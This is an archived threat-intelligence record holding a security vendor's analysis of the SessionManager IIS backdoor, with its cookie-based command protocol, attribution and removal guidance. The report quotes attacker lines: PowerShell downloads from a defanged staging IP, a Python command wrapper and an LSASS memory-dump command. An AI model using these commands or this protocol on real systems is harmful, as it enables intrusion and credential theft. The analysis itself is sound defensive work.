{ "id": "1432fef3-7e28-4960-b6ee-45c0b5e883cf", "created_at": "2026-04-06T00:14:26.643121Z", "updated_at": "2026-04-10T13:12:41.47318Z", "deleted_at": null, "sha1_hash": "cfc313980665c4ad34e2576b7aed8954c7d89631", "title": "The SessionManager IIS backdoor", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 315255, "plain_text": "The SessionManager IIS backdoor\r\nBy Pierre Delcher\r\nPublished: 2022-06-30 · Archived: 2026-04-05 17:19:34 UTC\r\nFollowing on from our earlier Owowa discovery, we continued to hunt for more backdoors potentially set up as\r\nmalicious modules within IIS, a popular web server edited by Microsoft. And we didn’t come back empty-handed…\r\nIn 2021, we noticed a trend among several threat actors for deploying a backdoor within IIS after exploiting one of\r\nthe ProxyLogon-type vulnerabilities within Microsoft Exchange servers. Dropping an IIS module as a backdoor\r\nenables threat actors to maintain persistent, update-resistant and relatively stealthy access to the IT infrastructure\r\nof a targeted organization; be it to collect emails, update further malicious access, or clandestinely manage\r\ncompromised servers that can be leveraged as malicious infrastructure.\r\nIn early 2022, we investigated one such IIS backdoor: SessionManager. In late April 2022, most of the samples we\r\nidentified were still not flagged as malicious in a popular online file scanning service, and SessionManager was\r\nstill deployed in over 20 organizations.\r\nSessionManager has been used against NGOs, government, military and industrial organizations in Africa, South\r\nAmerica, Asia, Europe, Russia and the Middle East, starting from at least March 2021. Because of the similar\r\nvictims, and use of a common OwlProxy variant, we believe the malicious IIS module may have been leveraged\r\nby the GELSEMIUM threat actor, as part of espionage operations.\r\nSessionManager: there’s yet another unwanted module in your web server\r\nDeveloped in C++, SessionManager is a malicious native-code IIS module whose aim is to be loaded by some IIS\r\napplications, to process legitimate HTTP requests that are continuously sent to the server.\r\nSuch malicious modules usually expect seemingly legitimate but specifically crafted HTTP requests from their\r\noperators, trigger actions based on the operators’ hidden instructions if any, then transparently pass the request to\r\nthe server for it to be processed just like any other request (see Figure 1).\r\nAs a result, such modules are not easily spotted by usual monitoring practices: they do not necessarily initiate\r\nsuspicious communications to external servers, receive commands through HTTP requests to a server that is\r\nspecifically exposed to such processes, and their files are often placed in overlooked locations that contain a lot of\r\nother legitimate files.\r\nhttps://securelist.com/the-sessionmanager-iis-backdoor/106868/\r\nPage 1 of 10\n\nFigure 1. Malicious IIS module processing requests\r\nSessionManager offers the following capabilities that, when combined, make it a lightweight persistent initial\r\naccess backdoor:\r\nReading, writing to and deleting arbitrary files on the compromised server.\r\nExecuting arbitrary binaries from the compromised server, also known as “remote command execution”.\r\nEstablishing connections to arbitrary network endpoints that can be reached by the compromised server, as\r\nwell as reading and writing in such connections.\r\nWe identified several variants of the SessionManager module, all including remains of their development\r\nenvironment (PDB paths) and compilation dates that are consistent with observed activity timeframes. This\r\ndemonstrates a continuous effort to update the backdoor:\r\nV0: the compilation date of the oldest sample we identified (MD5\r\n5FFC31841EB3B77F41F0ACE61BECD8FD) is from March 2021. The sample contains a development\r\npath (PDB path): “C:UsersGodLikeDesktoptt4StripHeaders-masterx64Releasesessionmanagermodule.pdb”. This indicates the SessionManager developer might have\r\nused the public source code of the StripHeaders IIS module as a template to first design SessionManager.\r\nV1: a later sample (MD5 84B20E95D52F38BB4F6C998719660C35) has a compilation date from April\r\n2021, and a PDB path set as\r\n“C:UsersGodLikeDesktoptt4SessionManagerModulex64Releasesessionmanagermodule.pdb”.\r\nV2: another sample (MD5 4EE3FB2ABA3B82171E6409E253BDDDB5) has a compilation date from\r\nAugust 2021, and a PDB path which is identical to the previous V1, except for the project folder name\r\nwhich is “SessionManagerV2Module”.\r\nV3: finally, the last sample we could identify (MD5 2410D0D7C20597D9B65F237F9C4CE6C9) is dated\r\nfrom September 2021 and has a project folder name set to “SessionManagerV3Module”.\r\nhttps://securelist.com/the-sessionmanager-iis-backdoor/106868/\r\nPage 2 of 10\n\nSessionManager command and control protocol details\r\nSessionManager hooks itself in the HTTP communications processing of the web server by checking HTTP data\r\njust before IIS answers to an HTTP request (see Figure 2). In this specific step of HTTP processing,\r\nSessionManager can check the whole content of the HTTP request from a client (an operator), and modify the\r\nanswer that is sent to the client by the server (to include results from backdoor activities), as previously shown in\r\nFigure 1.\r\nFigure 2. SessionManager registration within the web server upon loading\r\nCommands are passed from an operator to SessionManager using a specific HTTP cookie name. The answer from\r\nthe backdoor to an operator will usually be inserted in the body of the server HTTP response. If the expected\r\ncookie name and value format are not found in an HTTP request from a client, the backdoor will do nothing, and\r\nprocessing will continue as if the malicious module did not exist.\r\nThe specific HTTP cookie name that is checked by SessionManager is “SM_SESSIONID” in variants before V2\r\n(excluded), and “SM_SESSION” after. Formatting the exact command names and arguments also depends on the\r\nbackdoor variant:\r\nBefore V2 (excluded), most of the commands and associated parameters are all passed as a value[1] of the\r\nrequired SessionManager HTTP cookie, such as for a file reading command:\r\nCookie: SM_SESSIONID=ReadFile-afile.txt\r\nThe remote execution and the file writing functionalities require additional command data to be passed\r\nwithin the HTTP request body.\r\nAfter V2 (included), only the command name is passed as a value of the required SessionManager HTTP\r\ncookie. Command parameters are passed using names and values[2] of additional cookies, while some\r\ncommands still require data to be passed within the HTTP body as well. For example, the HTTP cookies\r\ndefinition for a file-reading command looks like this:\r\nCookie: SM_SESSION=GETFILE;FILEPATH=afile.txt;\r\nThe results of executed commands are returned as body data within HTTP responses. Before V2 (excluded),\r\nSessionManager did not encrypt or obfuscate command and control data. Starting with V2 (included), an\r\nhttps://securelist.com/the-sessionmanager-iis-backdoor/106868/\r\nPage 3 of 10\n\nadditional “SM_KEY” cookie can be included in HTTP requests from operators: if so, its value will be used as an\r\nXOR key to encode results that are sent by SessionManager.\r\nThe comprehensive list of commands for the most recent variant of SessionManager is presented below:\r\nCommand name\r\n(SM_SESSION\r\ncookie value)\r\nCommand parameters\r\n(additional cookies)\r\nAssociated capability\r\nGETFILE\r\nFILEPATH: path of file\r\nto be read. FILEPOS1:\r\noffset at which to start\r\nreading, from file start.\r\nFILEPOS2: maximum\r\nnumber of bytes to read.\r\nRead the content of a file on the compromised server and\r\nsend it to the operator as an HTTP binary file named\r\ncool.rar.\r\nPUTFILE\r\nFILEPATH: path of file\r\nto be written.\r\nFILEPOS1: offset at\r\nwhich to start writing.\r\nFILEPOS2: offset\r\nreference.\r\nFILEMODE: requested\r\nfile access type.\r\nWrite arbitrary content to a file on the compromised server.\r\nThe data to be written in the specified file is passed within\r\nthe HTTP request body.\r\nDELETEFILE\r\nFILEPATH: path of file\r\nto be deleted.\r\nDelete a file on the compromised server.\r\nFILESIZE\r\nFILEPATH: path of file\r\nto be measured.\r\nGet the size (in bytes) of the specified file.\r\nCMD None.\r\nRun an arbitrary process on the compromised server. The\r\nprocess to run and its arguments are specified in the HTTP\r\nrequest body using the format: \u003cexecutable\r\npath\u003et\u003carguments\u003e. The standard output and error data\r\nfrom process execution are sent back as plain text to the\r\noperator in the HTTP response body.\r\nPING None.\r\nCheck for SessionManager deployment. The “Wokring\r\nOK” (sic.) message will be sent to the operator in the\r\nHTTP response body.\r\nhttps://securelist.com/the-sessionmanager-iis-backdoor/106868/\r\nPage 4 of 10\n\nS5CONNECT\r\nS5HOST: hostname to\r\nconnect to (exclusive\r\nwith S5IP).\r\nS5PORT: offset at which\r\nto start writing.\r\nS5IP: IP address to\r\nconnect to if no\r\nhostname is given\r\n(exclusive with\r\nS5HOST).\r\nS5TIMEOUT: maximum\r\ndelay in seconds to allow\r\nfor connection.\r\nConnect from compromised host to a specified network\r\nendpoint, using a created TCP socket. The integer\r\nidentifier of the created and connected socket will be\r\nreturned as the value of the S5ID cookie variable in the\r\nHTTP response, and the status of the connection will be\r\nreported in the HTTP response body.\r\nS5WRITE\r\nS5ID: identifier of the\r\nsocket to write to, as\r\nreturned by\r\nS5CONNECT.\r\nWrite data to the specified connected socket. The data to\r\nbe written in the specified socket is passed within the\r\nHTTP request body.\r\nS5READ\r\nS5ID: identifier of the\r\nsocket to read from, as\r\nreturned by\r\nS5CONNECT.\r\nRead data from the specified connected socket. The read\r\ndata is sent back within the HTTP response body.\r\nS5CLOSE\r\nS5ID: identifier of the\r\nsocket to close, as\r\nreturned by\r\nS5CONNECT.\r\nTerminate an existing socket connection. The status of the\r\noperation is returned as a message within the HTTP\r\nresponse body.\r\nPost-deployment activities by SessionManager operators\r\nOnce deployed, SessionManager is leveraged by operators to further profile the targeted environment, gather in-memory passwords and deploy additional tools. Notably, operators used Powershell WebClient functionality from\r\na SessionManager remote execution command to download from the server IP address 202.182.123[.]185,\r\nbetween March and April 2021, such as:\r\npowershell \"(New-Object\r\nNet.WebClient).DownloadFile('hxxp://202.182.123[.]185/Dll2.dll','C:WindowsTempwin32.dll')\"\r\npowershell \"(New-Object\r\nNet.WebClient).DownloadFile('hxxp://202.182.123[.]185/ssp.exe','C:WindowsTempwin32.exe')\"\r\nhttps://securelist.com/the-sessionmanager-iis-backdoor/106868/\r\nPage 5 of 10\n\nC:WindowsTempwin32.exe C:WindowsTempwin32.dll\r\nAdditional tools that operators attempted to download and execute from SessionManager include a PowerSploit-based reflective loader for the Mimikatz DLL, Mimikatz SSP, ProcDump, as well as a legitimate memory dump\r\ntool from Avast (MD5 36F2F67A21745438A1CC430F2951DFBC). The latter has been abused by\r\nSessionManager operators to attempt to read the memory of the LSASS process, which would enable\r\nauthentication secrets collection on the compromised server. Operators also tried to leverage the Windows built-in\r\nMinidump capability to do the same thing.\r\nIn order to avoid detection by security products (which obviously failed in our case), SessionManager operators\r\nsometimes attempted additional malicious execution by running launcher scripts through the Windows services\r\nmanager command line. Starting from November 2021, operators tried to leverage custom PyInstaller-packed\r\nPython scripts to obfuscate command execution attempts. This kind of Python script source code would look as\r\nfollows:\r\nimport os, sys, base64, codecs\r\nfrom subprocess import PIPE, Popen\r\ndef cmdlet(c):\r\n      cmdlet = c.split('(-)')\r\n      p = Popen(cmdlet, stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=True)\r\n      _out, _err = p.communicate()\r\n      return (codecs.decode(_out, errors='backslashreplace'), codecs.decode(_out,\r\nerrors='backslashreplace'))\r\nprint('n---------------------n'.join(cmdlet(sys.argv[1])))\r\nAnd as a result, command execution attempts through this tool were made as follows:\r\nC:WindowsTempvmmsi.exe cmd.exe(-)/c(-)\"winchecksec.exe -accepteula -ma lsass.exe seclog.dmp\"\r\nIn one case in December 2021, SessionManager operators attempted to execute an additional tool that we\r\nunfortunately could not retrieve. This tool was set up to communicate with the IP address 207.148.109[.]111,\r\nwhich is most likely part of the operators’ infrastructure.\r\nSessionManager targets\r\nhttps://securelist.com/the-sessionmanager-iis-backdoor/106868/\r\nPage 6 of 10\n\nWe managed to identify 34 servers that were compromised by a SessionManager variant, belonging to 24 distinct\r\norganizations in Argentina, Armenia, China, Djibouti, Equatorial Guinea, Eswatini, Hong Kong, Indonesia,\r\nKenya, Kuwait, Malaysia, Nigeria, Pakistan, Poland, the Russian Federation, Saudi Arabia, Taiwan, Thailand,\r\nTurkey, the United Kingdom and Vietnam (see Figure 3).\r\nUsually, we could only identify one compromised server per organization, and only one compromised\r\norganization per location; but Vietnam is the main exception as several compromised servers from several\r\norganizations could be identified there. Amongst the identified organizations, 20 were still running a compromised\r\nserver as late as June 2022.\r\nAdditionally, we managed to identify an earlier target of the same campaign that was not compromised with\r\nSessionManager, in Laos in mid-March 2021 (see Attribution).\r\nFigure 3. Map of organizations targeted by SessionManager campaign (darker color indicates a higher\r\nconcentration) (download)\r\nMost of the compromised servers belong to government or military organizations, but we also identified\r\ninternational and national non-government organizations, an electronic equipment manufacturer, a shipbuilding\r\ncompany, a health care and surgery group, a local road transportation company, a state oil company, a state\r\nelectricity company, a sales kiosk manufacturer, and an ERP software editor.\r\nhttps://securelist.com/the-sessionmanager-iis-backdoor/106868/\r\nPage 7 of 10\n\nAttribution\r\nFirst, we identified an additional malicious binary (MD5 5F15B17FA0E88D40D4E426E53CF94549, compilation\r\ndate set in April 2020) that shares a common PDB path part with SessionManager samples\r\n(“C:UsersGodLikeDesktopt”). This binary is a password stealer designed to grab Windows users’ passwords when\r\nthey are changed. It is compiled from a Chinese-documented public source code called Hook-PasswordChangeNotify. Unfortunately, we could not retrieve any additional details about this binary exploitation,\r\nbut it may have been developed by the same developer as SessionManager.\r\nThen in mid-March 2021, shortly before our first SessionManager detection, we noticed that a threat actor\r\nleveraged ProxyLogon-type vulnerabilities against an Exchange Server in Laos to deploy a web shell and conduct\r\nmalicious activities using the same Mimikatz SSP and Avast memory dump tools that we described above (see\r\nPost-deployment activities from SessionManager operators). Not only were the tool samples the same, but one of\r\nthem was downloaded from the staging server that SessionManager operators leveraged (202.182.123[.]185). As a\r\nresult, we believe with medium to high confidence that those malicious activities were conducted by the same\r\nthreat actor behind SessionManager.\r\nInterestingly, the threat actor attempted to download and execute two samples of an HTTP server-type backdoor\r\ncalled OwlProxy on the compromised server in Laos. We then discovered that at least one of those OwlProxy\r\nsamples had also been downloaded from 202.182.123[.]185 on at least two SessionManager-compromised servers\r\nin late March 2021. As a result, we believe with medium to high confidence that the threat actor who operates\r\nSessionManager also used or tried to use those OwlProxy samples before introducing SessionManager.\r\nThe specific OwlProxy variant of the samples we retrieved has only been documented as part of GELSEMIUM’s\r\nactivities. We also noticed that SessionManager targets (see SessionManager targets) partly overlap with\r\nGELSEMIUM victims. As a result, we believe that SessionManager might be operated by GELSEMIUM, but not\r\nnecessarily only GELSEMIUM.\r\nGetting rid of IIS malicious modules\r\nOnce again, the activities described here show that the ProxyLogon-type vulnerabilities have been widely used\r\nsince March 2021 to deploy relatively simple yet very effective persistent server accesses, such as the\r\nSessionManager backdoor.\r\nWhile some of the ProxyLogon exploitation by advanced threat actors was documented right away, notably by\r\nKaspersky, SessionManager was poorly detected for a year. Facing massive and unprecedented server-side\r\nvulnerability exploitation, most cybersecurity actors were busy investigating and responding to the first identified\r\noffences. As a result, it is still possible to discover related malicious activities months or years later, and that will\r\nprobably be the case for a long time.\r\nIn any case, we cannot stress enough that IIS servers must undergo a complete and dedicated investigation process\r\nafter the gigantic opportunity that ProxyLogon-style vulnerabilities exposed, starting in 2021. Loaded IIS modules\r\ncan be listed for a running IIS instance by using the IIS Manager GUI, or from the IIS appcmd command line. If a\r\nhttps://securelist.com/the-sessionmanager-iis-backdoor/106868/\r\nPage 8 of 10\n\nmalicious module is identified, we recommend the following template of actions (merely deleting the malicious\r\nmodule file will not be enough to get rid of it):\r\nTake a volatile memory snapshot on the currently running system where IIS is executed. Request assistance\r\nfrom forensics and incident response experts if required.\r\nStop the IIS server, and ideally disconnect the underlying system from publicly reachable networks.\r\nBack up all files and logs from your IIS environment, to retain data for further incident response. Check\r\nthat the backups can be opened or extracted successfully.\r\nUsing IIS Manager or the appcmd command tool, remove every reference of the identified module from\r\napps and server configurations. Manually review associated IIS XML configuration files to make sure any\r\nreference to the malicious modules have been removed – manually remove the references in XML files\r\notherwise.\r\nUpdate the IIS server and underlying operating system to make sure no known vulnerabilities remain\r\nexposed to attackers.\r\nRestart the IIS server and bring the system online again.\r\nIt is advised to then proceed with malicious module analysis and incident response activities (from the memory\r\nsnapshot and backups that have been prepared), in order to understand how the identified malicious tools have\r\nbeen leveraged by their operators.\r\nIndicators of Compromise\r\nSessionManager\r\n5FFC31841EB3B77F41F0ACE61BECD8FD\r\n84B20E95D52F38BB4F6C998719660C35\r\n4EE3FB2ABA3B82171E6409E253BDDDB5\r\n2410D0D7C20597D9B65F237F9C4CE6C9\r\nMimikatz runners\r\n95EBBF04CEFB39DB5A08DC288ADD2BBC\r\nF189D8EFA0A8E2BEE1AA1A6CA18F6C2B\r\nPyInstaller-packed process creation wrapper\r\n65DE95969ADBEDB589E8DAFE903C5381\r\nOwlProxy variant samples\r\n235804E3577EA3FE13CE1A7795AD5BF9\r\n30CDA3DFF9123AD3B3885B4EA9AC11A8\r\nPossibly related password stealer\r\n5F15B17FA0E88D40D4E426E53CF94549\r\nFiles paths\r\n%PROGRAMFILES%MicrosoftExchange ServerV15ClientAccessOWAAuthSessionManagerModule.dll\r\n%PROGRAMFILES%MicrosoftExchange ServerV15FrontEndHttpProxybinSessionManagerModule.dll\r\nhttps://securelist.com/the-sessionmanager-iis-backdoor/106868/\r\nPage 9 of 10\n\n%WINDIR%System32inetsrvSessionManagerModule.dll\r\n%WINDIR%System32inetsrvSessionManager.dll\r\nC:WindowsTempExchangeSetupExch.ps1\r\nC:WindowsTempExch.exe\r\nC:WindowsTempvmmsi.exe\r\nC:WindowsTempsafenet.exe\r\nC:WindowsTempupgrade.exe\r\nC:WindowsTempexupgrade.exe\r\nC:WindowsTempdvvm.exe\r\nC:WindowsTempvgauth.exe\r\nC:WindowsTempwin32.exe\r\nPDB Paths\r\nC:UsersGodLikeDesktoptt4StripHeaders-masterx64Releasesessionmanagermodule.pdb\r\nC:UsersGodLikeDesktoptt4SessionManagerModulex64Releasesessionmanagermodule.pdb\r\nC:UsersGodLikeDesktoptt4SessionManagerV2Modulex64Releasesessionmanagermodule.pdb\r\nC:UsersGodLikeDesktoptt4SessionManagerV3Modulex64Releasesessionmanagermodule.pdb\r\nC:UsersGodLikeDesktoptt0Hook-PasswordChangeNotify-masterHookPasswordChangex64ReleaseHookPasswordChange.pdb\r\nIP addresses\r\n202.182.123[.]185 (Staging server, between 2021-03 and 04 at least)\r\n207.148.109[.]111 (Unidentified infrastructure)\r\n[1]\r\n As per RFC:2109 (title 4.1) and its successor RFC:2965 (title 3.1), values of HTTP cookies that contain\r\ncharacters such as filepath backslashes should be quoted. SessionManager does not care to comply with\r\nreferenced RFCs, and does not unquote such values, so will fail to process a cookie value that contains filepaths\r\nincluding backslashes as sent by standard HTTP clients.\r\n[2]\r\n The previous cookie value limitations (see footnote 1) still exist with V2+. In addition, any cookie variable\r\ndefinition to be processed by SessionManager V2+ must be terminated with a ‘;’ character, even if there is only\r\none cookie variable set.\r\nSource: https://securelist.com/the-sessionmanager-iis-backdoor/106868/\r\nhttps://securelist.com/the-sessionmanager-iis-backdoor/106868/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://securelist.com/the-sessionmanager-iis-backdoor/106868/" ], "report_names": [ "106868" ], "threat_actors": [ { "id": "2d4d2356-8f9e-464d-afc6-2403ce8cf424", "created_at": "2023-01-06T13:46:39.290101Z", "updated_at": "2026-04-10T02:00:03.275981Z", "deleted_at": null, "main_name": "Gelsemium", "aliases": [ "狼毒草" ], "source_name": "MISPGALAXY:Gelsemium", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "77874718-7ad2-4d15-9831-10935ab9bcbe", "created_at": "2022-10-25T15:50:23.619911Z", "updated_at": "2026-04-10T02:00:05.349462Z", "deleted_at": null, "main_name": "Gelsemium", "aliases": [ "Gelsemium" ], "source_name": "MITRE:Gelsemium", "tools": [ "Gelsemium", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "b5550c4e-943a-45ea-bf67-875b989ee4c4", "created_at": "2022-10-25T16:07:23.675771Z", "updated_at": "2026-04-10T02:00:04.707782Z", "deleted_at": null, "main_name": "Gelsemium", "aliases": [ "Operation NightScout", "Operation TooHash" ], "source_name": "ETDA:Gelsemium", "tools": [ "ASPXSpy", "ASPXTool", "Agentemis", "BadPotato", "CHINACHOPPER", "China Chopper", "Chrommme", "Cobalt Strike", "CobaltStrike", "FireWood", "Gelsemine", "Gelsenicine", "Gelsevirine", "JuicyPotato", "OwlProxy", "Owowa", "SAMRID", "SessionManager", "SinoChopper", "SpoolFool", "SweetPotato", "WolfsBane", "cobeacon", "reGeorg" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434466, "ts_updated_at": 1775826761, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/cfc313980665c4ad34e2576b7aed8954c7d89631.pdf", "text": "https://archive.orkl.eu/cfc313980665c4ad34e2576b7aed8954c7d89631.txt", "img": "https://archive.orkl.eu/cfc313980665c4ad34e2576b7aed8954c7d89631.jpg" } }